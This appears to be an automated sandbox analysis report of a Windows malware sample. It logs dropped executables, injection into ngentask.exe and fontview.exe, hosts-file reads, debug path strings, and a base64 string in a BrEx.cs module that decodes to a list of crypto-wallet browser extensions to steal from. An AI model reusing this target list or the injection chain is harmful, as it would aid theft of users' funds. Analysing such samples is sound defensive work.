srtg-Cyrldsbsmjuz-Latnsmszhnnbsaz-Latnsmauz-Cyrlmn-Cyrlquc-Lat
Source: fontview.exe, 0000000D.00000003.529256728.0000000004C40000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: RtlDllShutdownInProgress_p0.System......./UseSystemForSystemFoldersSoftware\Microsoft\Windows\CurrentVersion\Explorerdesktop.ini%APPDATA%%USERPROFILE%%ALLUSERSPROFILE%%ProgramFiles%%SystemRoot%%SystemDrive%\\%COMPUTERNAME%...\...PATH.exe.lnk.cmd.bat.com.pifCutListSoftware\Microsoft\Windows\CurrentVersion\Explorer\FileAssociation\VarFileInfo\Translation\StringFileInfo\%04X%04X\FileDescription\StringFileInfo\040904E4\FileDescription\StringFileInfo\04090000\FileDescriptionProgram ManagerpszDesktopTitleW%%%s%%%sUSERPROFILEProgramFilesSystemRootSystemDrivewindir"%1"commandshellSoftware\classesDefaultIconshell\%sAssignmentType0Software\Classes\Applications\%sSoftware\Classes\Applications%1.ade.adp.app.asp.cer.chm.cnt.crt.csh.der.fxp.gadget.grp.hlp.hpj.inf.ins.isp.its.js.jse.ksh.mad.maf.mag.mam.maq.mar.mas.mat.mau.mav.maw.mcf.mda.mdb.mde.mdt.mdw.mdz.msc.msh.msh1.msh1xml.msh2.msh2xml.mshxml.msp.mst.msu.ops.pcd.pl.plg.prf.prg.printerexport.ps1.ps1xml.ps2.ps2xml.psc1.psc2.psd1.psm1.pst.scf.sct.shb.shs.theme.tmp.url.vbe.vbp.vbs.vhd.vhdx.vsmacros.vsw.webpnp.ws.wsc.wsf.wsh.xnkHKCU:HKLM:HKCR:%s\shell\%s\commandshell\%s\commandSoftware\Clients\%sSoftware\Clients\%s\%sOpen.*....../UseSystemForSystemFoldersdesktop.ini%SystemDrive%\\%COMPUTERNAME%...\...%s\%s\StringFileInfo\04090000\FileDescriptionT

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\C676.exe C:\Users\user\AppData\Local\Temp\C676.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\beirutt C:\Users\user\AppData\Roaming\beirutt
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\43D0.exe C:\Users\user\AppData\Local\Temp\43D0.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\C4AA.exe C:\Users\user\AppData\Local\Temp\C4AA.exe
Source: C:\Users\user\AppData\Local\Temp\43D0.exe	Process created: C:\Users\user\AppData\Local\Temp\43D0.exe C:\Users\user\AppData\Local\Temp\43D0.exe
Source: C:\Users\user\AppData\Local\Temp\C4AA.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe
Source: C:\Users\user\AppData\Local\Temp\C4AA.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe
Source: C:\Users\user\AppData\Local\Temp\C4AA.exe	Process created: C:\Windows\SysWOW64\fontview.exe C:\Windows\SYSWOW64\fontview.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\C676.exe C:\Users\user\AppData\Local\Temp\C676.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\43D0.exe C:\Users\user\AppData\Local\Temp\43D0.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\C4AA.exe C:\Users\user\AppData\Local\Temp\C4AA.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\43D0.exe	Process created: C:\Users\user\AppData\Local\Temp\43D0.exe C:\Users\user\AppData\Local\Temp\43D0.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C4AA.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C4AA.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C4AA.exe	Process created: C:\Windows\SysWOW64\fontview.exe C:\Windows\SYSWOW64\fontview.exe	Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{993BE281-6695-4BA5-8A2A-7AACBFAAB69E}\InprocServer32

Jump to behavior

Source: C:\Windows\SysWOW64\fontview.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Local\Temp\C676.tmp

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_007B005C CreateToolhelp32Snapshot,Module32First,

0_2_007B005C

Source: 9.3.C4AA.exe.df30000.1.unpack, BrEx.cs	Base64 encoded string: 'ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8WW9yb2lXYWxsZXQKaWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8VHJvbmxpbmsKamJkYW9jbmVpaWlubWpiamxnYWxoY2VsZ2Jlam1uaWR8TmlmdHlXYWxsZXQKbmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58TWV0YW1hc2sKYWZiY2JqcGJwZmFkbGttaG1jbGhrZWVvZG1hbWNmbGN8TWF0aFdhbGxldApobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHxDb2luYmFzZQpmaGJvaGltYWVsYm9ocGpiYmxkY25nY25hcG5kb2RqcHxCaW5hbmNlQ2hhaW4Kb2RiZnBlZWloZGtiaWhtb3BrYmptb29uZmFubGJmY2x8QnJhdmVXYWxsZXQKaHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58R3VhcmRhV2FsbGV0CmJsbmllaWlmZmJvaWxsa25qbmVwb2dqaGtnbm9hcGFjfEVxdWFsV2FsbGV0CmNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfEpheHh4TGliZXJ0eQpmaWhrYWtmb2JrbWtqb2pwY2hwZmdjbWhmam5tbmZwaXxCaXRBcHBXYWxsZXQKa25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8aVdhbGxldAphbWttamptbWZsZGRvZ21ocGpsb2ltaXBib2ZuZmppaHxXb21iYXQKZmhpbGFoZWltZ2xpZ25kZGtqZ29ma2NiZ2VraGVuYmh8QXRvbWljV2FsbGV0Cm5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfE1ld0N4Cm5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfEd1aWxkV2FsbGV0Cm5rZGRnbmNkamdqZmNkZGFtZmdjbWZubGhjY25pbWlnfFNhdHVybldhbGxldApmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3xSb25pbldhbGxldAphaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHxUZXJyYVN0YXRpb24KZm5uZWdwaGxvYmpkcGtoZWNhcGtpampka2djamhraWJ8SGFybW9ueVdhbGxldAphZWFjaGtubWVmcGhlcGNjaW9uYm9vaGNrb25vZWVtZ3xDb2luOThXYWxsZXQKY2dlZW9kcGZhZ2pjZWVmaWVmbG1kZnBocGxrZW5sZmt8VG9uQ3J5c3RhbApwZGFkamtma2djYWZnYmNlaW1jcGJrYWxuZm5lcGJua3xLYXJkaWFDaGFpbgpiZm5hZWxtb21laW1obHBtZ2puam9waGhwa2tvbGpwYXxQaGFudG9tCmZoaWxhaGVpbWdsaWduZGRramdvZmtjYmdla2hlbmJofE94eWdlbgptZ2Zma2ZiaWRpaGpwb2FvbWFqbGJnY2hkZGxpY2dwbnxQYWxpV2FsbGV0CmFvZGtrYWduYWRjYm9iZnBnZ2ZuamVvbmdlbWpiamNhfEJvbHRYCmtwZm9wa2VsbWFwY29pcGVtZmVuZG1kY2dobmVnaW1ufExpcXVhbGl0eVdhbGxldApobWVvYm5mbmZjbWRrZGNtbGJsZ2FnbWZwZmJvaWVhZnxYZGVmaVdhbGxldApscGZjYmprbmlqcGVlaWxsaWZua2lrZ25jaWtnZmhkb3xOYW1pV2FsbGV0CmRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfE1haWFyRGVGaVdhbGxldApmZm5iZWxmZG9laW9oZW5ramlibm1hZGppZWhqaGFqYnxZb3JvaVdhbGxldAppYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb2lob2ZlY3xUcm9ubGluawpqYmRhb2NuZWlpaW5tamJqbGdhbGhjZWxnYmVqbW5pZHxOaWZ0eVdhbGxldApua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnxNZXRhbWFzawphZmJjYmpwYnBmYWRsa21obWNsaGtlZW9kbWFtY2ZsY3xNYXRoV2FsbGV0CmhuZmFua25vY2Zlb2ZiZGRnY2lqbm1obmZua2RuYWFkfENvaW5iYXNlCmZoYm9oaW1hZWxib2hwamJibGRjbmdjbmFwbmRvZGpwfEJpbmFuY2VDaGFpbgpvZGJmcGVlaWhka2JpaG1vcGtiam1vb25mYW5sYmZjbHxCcmF2ZVdhbGxldApocGdsZmhnZm5oYmdwamRlbmpnbWRnb2VpYXBwYWZsbnxHdWFyZGFXYWxsZXQKYmxuaWVpaWZmYm9pbGxrbmpuZXBvZ2poa2dub2FwYWN8RXF1YWxXYWxsZXQKY2plbGZwbHBsZWJkamplbmxscGpjYmxtamtmY2ZmbmV8SmF4eHhMaWJlcnR5CmZpaGtha2ZvYmtta2pvanBjaHBmZ2NtaGZqbm1uZnBpfEJpdEFwcFdhbGxldAprbmNjaGRpZ29iZ2hlbmJiYWRkb2pqbm5hb2dmcHBmanxpV2FsbGV0CmFta21qam1tZmxkZG9nbWhwamxvaW1pcGJvZm5mamlofFdvbWJhdApmaGlsYWhlaW1nbGlnbmRka2pnb2ZrY2JnZWtoZW5iaHxBdG9taWNXYWxsZXQKbmxibW5uaWpjbmxlZ2tqanBjZmpjbG1jZmdnZmVmZG18TWV3Q3gKbmFuam1ka25oa2luaWZua2dkY2dnY2ZuaGRhYW1tbWp8R3VpbGRXYWxsZXQKbmtkZGduY2RqZ2pmY2RkYW1mZ2NtZm5saGNjbmltaWd8U2F0dXJuV2FsbGV0CmZuamhta2hobWtiamtrYWJuZGNubm9nYWdvZ2JuZWVjfFJvbmluV2FsbGV
Source: 9.3.C4AA.exe.df30000.0.unpack, BrEx.cs	Base64 encoded string: 'ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8WW9yb2lXYWxsZXQKaWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8VHJvbmxpbmsKamJkYW9jbmVpaWlubWpiamxnYWxoY2VsZ2Jlam1uaWR8TmlmdHlXYWxsZXQKbmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58TWV0YW1hc2sKYWZiY2JqcGJwZmFkbGttaG1jbGhrZWVvZG1hbWNmbGN8TWF0aFdhbGxldApobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHxDb2luYmFzZQpmaGJvaGltYWVsYm9ocGpiYmxkY25nY25hcG5kb2RqcHxCaW5hbmNlQ2hhaW4Kb2RiZnBlZWloZGtiaWhtb3BrYmptb29uZmFubGJmY2x8QnJhdmVXYWxsZXQKaHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58R3VhcmRhV2FsbGV0CmJsbmllaWlmZmJvaWxsa25qbmVwb2dqaGtnbm9hcGFjfEVxdWFsV2FsbGV0CmNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfEpheHh4TGliZXJ0eQpmaWhrYWtmb2JrbWtqb2pwY2hwZmdjbWhmam5tbmZwaXxCaXRBcHBXYWxsZXQKa25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8aVdhbGxldAphbWttamptbWZsZGRvZ21ocGpsb2ltaXBib2ZuZmppaHxXb21iYXQKZmhpbGFoZWltZ2xpZ25kZGtqZ29ma2NiZ2VraGVuYmh8QXRvbWljV2FsbGV0Cm5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfE1ld0N4Cm5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfEd1aWxkV2FsbGV0Cm5rZGRnbmNkamdqZmNkZGFtZmdjbWZubGhjY25pbWlnfFNhdHVybldhbGxldApmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3xSb25pbldhbGxldAphaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHxUZXJyYVN0YXRpb24KZm5uZWdwaGxvYmpkcGtoZWNhcGtpampka2djamhraWJ8SGFybW9ueVdhbGxldAphZWFjaGtubWVmcGhlcGNjaW9uYm9vaGNrb25vZWVtZ3xDb2luOThXYWxsZXQKY2dlZW9kcGZhZ2pjZWVmaWVmbG1kZnBocGxrZW5sZmt8VG9uQ3J5c3RhbApwZGFkamtma2djYWZnYmNlaW1jcGJrYWxuZm5lcGJua3xLYXJkaWFDaGFpbgpiZm5hZWxtb21laW1obHBtZ2puam9waGhwa2tvbGpwYXxQaGFudG9tCmZoaWxhaGVpbWdsaWduZGRramdvZmtjYmdla2hlbmJofE94eWdlbgptZ2Zma2ZiaWRpaGpwb2FvbWFqbGJnY2hkZGxpY2dwbnxQYWxpV2FsbGV0CmFvZGtrYWduYWRjYm9iZnBnZ2ZuamVvbmdlbWpiamNhfEJvbHRYCmtwZm9wa2VsbWFwY29pcGVtZmVuZG1kY2dobmVnaW1ufExpcXVhbGl0eVdhbGxldApobWVvYm5mbmZjbWRrZGNtbGJsZ2FnbWZwZmJvaWVhZnxYZGVmaVdhbGxldApscGZjYmprbmlqcGVlaWxsaWZua2lrZ25jaWtnZmhkb3xOYW1pV2FsbGV0CmRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfE1haWFyRGVGaVdhbGxldApmZm5iZWxmZG9laW9oZW5ramlibm1hZGppZWhqaGFqYnxZb3JvaVdhbGxldAppYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb2lob2ZlY3xUcm9ubGluawpqYmRhb2NuZWlpaW5tamJqbGdhbGhjZWxnYmVqbW5pZHxOaWZ0eVdhbGxldApua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnxNZXRhbWFzawphZmJjYmpwYnBmYWRsa21obWNsaGtlZW9kbWFtY2ZsY3xNYXRoV2FsbGV0CmhuZmFua25vY2Zlb2ZiZGRnY2lqbm1obmZua2RuYWFkfENvaW5iYXNlCmZoYm9oaW1hZWxib2hwamJibGRjbmdjbmFwbmRvZGpwfEJpbmFuY2VDaGFpbgpvZGJmcGVlaWhka2JpaG1vcGtiam1vb25mYW5sYmZjbHxCcmF2ZVdhbGxldApocGdsZmhnZm5oYmdwamRlbmpnbWRnb2VpYXBwYWZsbnxHdWFyZGFXYWxsZXQKYmxuaWVpaWZmYm9pbGxrbmpuZXBvZ2poa2dub2FwYWN8RXF1YWxXYWxsZXQKY2plbGZwbHBsZWJkamplbmxscGpjYmxtamtmY2ZmbmV8SmF4eHhMaWJlcnR5CmZpaGtha2ZvYmtta2pvanBjaHBmZ2NtaGZqbm1uZnBpfEJpdEFwcFdhbGxldAprbmNjaGRpZ29iZ2hlbmJiYWRkb2pqbm5hb2dmcHBmanxpV2FsbGV0CmFta21qam1tZmxkZG9nbWhwamxvaW1pcGJvZm5mamlofFdvbWJhdApmaGlsYWhlaW1nbGlnbmRka2pnb2ZrY2JnZWtoZW5iaHxBdG9taWNXYWxsZXQKbmxibW5uaWpjbmxlZ2tqanBjZmpjbG1jZmdnZmVmZG18TWV3Q3gKbmFuam1ka25oa2luaWZua2dkY2dnY2ZuaGRhYW1tbWp8R3VpbGRXYWxsZXQKbmtkZGduY2RqZ2pmY2RkYW1mZ2NtZm5saGNjbmltaWd8U2F0dXJuV2FsbGV0CmZuamhta2hobWtiamtrYWJuZGNubm9nYWdvZ2JuZWVjfFJvbmluV2FsbGV
Source: 12.2.ngentask.exe.400000.0.unpack, BrEx.cs	Base64 encoded string: 'ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8WW9yb2lXYWxsZXQKaWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8VHJvbmxpbmsKamJkYW9jbmVpaWlubWpiamxnYWxoY2VsZ2Jlam1uaWR8TmlmdHlXYWxsZXQKbmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58TWV0YW1hc2sKYWZiY2JqcGJwZmFkbGttaG1jbGhrZWVvZG1hbWNmbGN8TWF0aFdhbGxldApobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHxDb2luYmFzZQpmaGJvaGltYWVsYm9ocGpiYmxkY25nY25hcG5kb2RqcHxCaW5hbmNlQ2hhaW4Kb2RiZnBlZWloZGtiaWhtb3BrYmptb29uZmFubGJmY2x8QnJhdmVXYWxsZXQKaHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58R3VhcmRhV2FsbGV0CmJsbmllaWlmZmJvaWxsa25qbmVwb2dqaGtnbm9hcGFjfEVxdWFsV2FsbGV0CmNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfEpheHh4TGliZXJ0eQpmaWhrYWtmb2JrbWtqb2pwY2hwZmdjbWhmam5tbmZwaXxCaXRBcHBXYWxsZXQKa25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8aVdhbGxldAphbWttamptbWZsZGRvZ21ocGpsb2ltaXBib2ZuZmppaHxXb21iYXQKZmhpbGFoZWltZ2xpZ25kZGtqZ29ma2NiZ2VraGVuYmh8QXRvbWljV2FsbGV0Cm5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfE1ld0N4Cm5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfEd1aWxkV2FsbGV0Cm5rZGRnbmNkamdqZmNkZGFtZmdjbWZubGhjY25pbWlnfFNhdHVybldhbGxldApmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3xSb25pbldhbGxldAphaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHxUZXJyYVN0YXRpb24KZm5uZWdwaGxvYmpkcGtoZWNhcGtpampka2djamhraWJ8SGFybW9ueVdhbGxldAphZWFjaGtubWVmcGhlcGNjaW9uYm9vaGNrb25vZWVtZ3xDb2luOThXYWxsZXQKY2dlZW9kcGZhZ2pjZWVmaWVmbG1kZnBocGxrZW5sZmt8VG9uQ3J5c3RhbApwZGFkamtma2djYWZnYmNlaW1jcGJrYWxuZm5lcGJua3xLYXJkaWFDaGFpbgpiZm5hZWxtb21laW1obHBtZ2puam9waGhwa2tvbGpwYXxQaGFudG9tCmZoaWxhaGVpbWdsaWduZGRramdvZmtjYmdla2hlbmJofE94eWdlbgptZ2Zma2ZiaWRpaGpwb2FvbWFqbGJnY2hkZGxpY2dwbnxQYWxpV2FsbGV0CmFvZGtrYWduYWRjYm9iZnBnZ2ZuamVvbmdlbWpiamNhfEJvbHRYCmtwZm9wa2VsbWFwY29pcGVtZmVuZG1kY2dobmVnaW1ufExpcXVhbGl0eVdhbGxldApobWVvYm5mbmZjbWRrZGNtbGJsZ2FnbWZwZmJvaWVhZnxYZGVmaVdhbGxldApscGZjYmprbmlqcGVlaWxsaWZua2lrZ25jaWtnZmhkb3xOYW1pV2FsbGV0CmRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfE1haWFyRGVGaVdhbGxldApmZm5iZWxmZG9laW9oZW5ramlibm1hZGppZWhqaGFqYnxZb3JvaVdhbGxldAppYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb2lob2ZlY3xUcm9ubGluawpqYmRhb2NuZWlpaW5tamJqbGdhbGhjZWxnYmVqbW5pZHxOaWZ0eVdhbGxldApua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnxNZXRhbWFzawphZmJjYmpwYnBmYWRsa21obWNsaGtlZW9kbWFtY2ZsY3xNYXRoV2FsbGV0CmhuZmFua25vY2Zlb2ZiZGRnY2lqbm1obmZua2RuYWFkfENvaW5iYXNlCmZoYm9oaW1hZWxib2hwamJibGRjbmdjbmFwbmRvZGpwfEJpbmFuY2VDaGFpbgpvZGJmcGVlaWhka2JpaG1vcGtiam1vb25mYW5sYmZjbHxCcmF2ZVdhbGxldApocGdsZmhnZm5oYmdwamRlbmpnbWRnb2VpYXBwYWZsbnxHdWFyZGFXYWxsZXQKYmxuaWVpaWZmYm9pbGxrbmpuZXBvZ2poa2dub2FwYWN8RXF1YWxXYWxsZXQKY2plbGZwbHBsZWJkamplbmxscGpjYmxtamtmY2ZmbmV8SmF4eHhMaWJlcnR5CmZpaGtha2ZvYmtta2pvanBjaHBmZ2NtaGZqbm1uZnBpfEJpdEFwcFdhbGxldAprbmNjaGRpZ29iZ2hlbmJiYWRkb2pqbm5hb2dmcHBmanxpV2FsbGV0CmFta21qam1tZmxkZG9nbWhwamxvaW1pcGJvZm5mamlofFdvbWJhdApmaGlsYWhlaW1nbGlnbmRka2pnb2ZrY2JnZWtoZW5iaHxBdG9taWNXYWxsZXQKbmxibW5uaWpjbmxlZ2tqanBjZmpjbG1jZmdnZmVmZG18TWV3Q3gKbmFuam1ka25oa2luaWZua2dkY2dnY2ZuaGRhYW1tbWp8R3VpbGRXYWxsZXQKbmtkZGduY2RqZ2pmY2RkYW1mZ2NtZm5saGNjbmltaWd8U2F0dXJuV2FsbGV0CmZuamhta2hobWtiamtrYWJuZGNubm9nYWdvZ2JuZWVjfFJvbmluV2FsbGV

Source: C:\Users\user\AppData\Roaming\beirutt

Command line argument: neyijabizux

7_2_00403A3E

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C4AA.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C4AA.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\43D0.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\43D0.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Windows\explorer.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: wkernel32.pdb source: fontview.exe, 0000000D.00000003.515386318.0000000004D70000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.514698930.0000000004C4C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: WINMMBASE.pdbUGP source: fontview.exe, 0000000D.00000003.562076898.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ucrtbase.pdb source: fontview.exe, 0000000D.00000003.526678012.0000000005170000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.526108390.0000000004C4D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: msvcrt.pdb source: fontview.exe, 0000000D.00000003.521974726.0000000004C4E000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.522197906.0000000004D10000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wrpcrt4.pdb source: fontview.exe, 0000000D.00000003.523535376.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.522585923.0000000004C4F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: fontview.exe, 0000000D.00000002.574375673.0000000004DE0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.511481087.0000000004C44000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.510890139.0000000004C46000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: shcore.pdb source: fontview.exe, 0000000D.00000003.535582414.0000000004C45000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wwin32u.pdbGCTL source: fontview.exe, 0000000D.00000003.529166790.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: bcryptprimitives.pdbUGP source: fontview.exe, 0000000D.00000003.524433598.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: _C:\fepovilorefego5.pdb source: explorer.exe, 00000003.00000003.445965683.0000000004AC0000.00000004.00000001.00020000.00000000.sdmp, C676.exe, 00000006.00000000.445306622.0000000000401000.00000020.00000001.01000000.00000006.sdmp, C676.exe.3.dr
Source:	Binary string: setupapi.pdbUGP source: fontview.exe, 0000000D.00000003.564997815.0000000005178000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.567165020.00000000055B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wgdi32.pdb source: fontview.exe, 0000000D.00000003.524543402.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: fltLib.pdb source: fontview.exe, 0000000D.00000003.557086498.0000000004B20000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: advapi32.pdb source: fontview.exe, 0000000D.00000003.521207061.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wsspicli.pdb source: fontview.exe, 0000000D.00000003.524283148.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: winmm.pdbUGP source: fontview.exe, 0000000D.00000003.561765846.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: cfgmgr32.pdbUGP source: fontview.exe, 0000000D.00000003.546083701.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\nujiwucosunes\vezik.pdb source: explorer.exe, 00000003.00000003.463370159.0000000006570000.00000004.00000001.00020000.00000000.sdmp, 43D0.exe, 00000008.00000002.477465572.0000000000401000.00000020.00000001.01000000.00000008.sdmp, 43D0.exe, 00000008.00000000.462284028.0000000000401000.00000020.00000001.01000000.00000008.sdmp, 43D0.exe, 0000000A.00000000.475726435.0000000000401000.00000020.00000001.01000000.00000008.sdmp
Source:	Binary string: shell32.pdb source: fontview.exe, 0000000D.00000003.543911919.00000000064F0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.541667280.0000000005177000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: 43D0.exe, 00000008.00000002.479914181.0000000004980000.00000040.00001000.00020000.00000000.sdmp, 43D0.exe, 0000000A.00000002.481185705.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: wrpcrt4.pdbUGP source: fontview.exe, 0000000D.00000003.523535376.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.522585923.0000000004C4F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Timayiko\Kodale\hiwer\Fami\Somayofa wiho.pdb source: C4AA.exe, 00000009.00000000.469180879.00000000009BC000.00000002.00000001.01000000.00000009.sdmp, C4AA.exe, 00000009.00000002.573291842.00000000009BC000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: msvcp_win.pdb source: fontview.exe, 0000000D.00000003.525933343.0000000004C40000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000002.581848569.0000000004F70000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: psapi.pdbUGP source: fontview.exe, 0000000D.00000003.564929757.0000000004B20000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wgdi32.pdbUGP source: fontview.exe, 0000000D.00000003.524543402.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
